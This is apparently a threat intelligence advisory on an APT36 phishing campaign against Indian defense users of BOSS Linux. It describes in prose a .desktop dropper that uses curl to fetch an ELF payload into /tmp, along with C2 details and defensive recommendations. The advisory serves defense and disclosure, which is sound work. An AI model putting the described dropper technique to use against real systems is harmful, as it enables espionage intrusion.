APT36 Targets Indian Defense via BOSS Linux with Phishing Tactics

This campaign demonstrates an advanced evolution in APT36’s capabilities, marking one of the first large-scale Linux-specific phishing operations attributed to the group. The use of .desktop files as droppers and the seamless deployment of ELF binaries indicate deep operational planning aimed at stealth and persistence.

Severity Level: High

Threat Overview

• Threat Actor: APT36 (Transparent Tribe)
• Motivation: Cyber-espionage against Indian targets
• Malware Components: Cyber-Security-Advisory.desktop (launcher), BOSS.elf (payload)
• Primarily Targeted: India
• Affected / Targeted Sectors: Indian Defense Sector, Government Agencies
• Affected Products / Versions: BOSS Linux (Linux distribution used in Indian government)

Attack Flow

1. Victim receives phishing email with ZIP attachment.
2. ZIP contains a .desktop shortcut file.
3. Clicking executes commands:
   • Downloads and opens decoy slide.pptx (iframe-based).
   • Simultaneously downloads BOSS.elf binary.
4. Execution Strategy: Uses bash scripting, curl, nohup, and chmod. Silently runs in /tmp
5. Malware connects to remote C2 server 101.99.92[.]182 on port 12520.
6. Collects system info, takes screenshots, exfiltrates data silently.

Recommendations

1. Email & Endpoint Hardening

• Block .desktop and .elf file types in email.
• Disable execution of email attachments by default, unless explicitly verified.
• Use sandbox analysis for attachments.

2. User Awareness

• Conduct phishing simulation and awareness programs.
• Train personnel on attachment and link safety.

3. System and Application Hardening

• Ensure BOSS Linux systems and all open-source applications (like LibreOffice, curl, etc.) are up to date with the latest security patches to reduce exploitation vectors.
• Apply execution restrictions on /tmp and similar directories.
• Block execution of unknown binaries downloaded via scripts unless verified and signed by the organization.

4. Network Defences and EDR

• Monitor port 12520 for unauthorized connections.
• Segment networks to contain potential intrusions.
• Deploy EDR (Endpoint Detection and Response) tools capable of detecting Linux threats, unauthorized process execution, and unusual network behaviour.

5. Block the IOCs at their respective controls.
https://www.virustotal.com/gui/collection/0c3a954cecd68a3aeea320cf7f445742dce90878b62d71964725ae979730dbb9/iocs

Source:

• https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.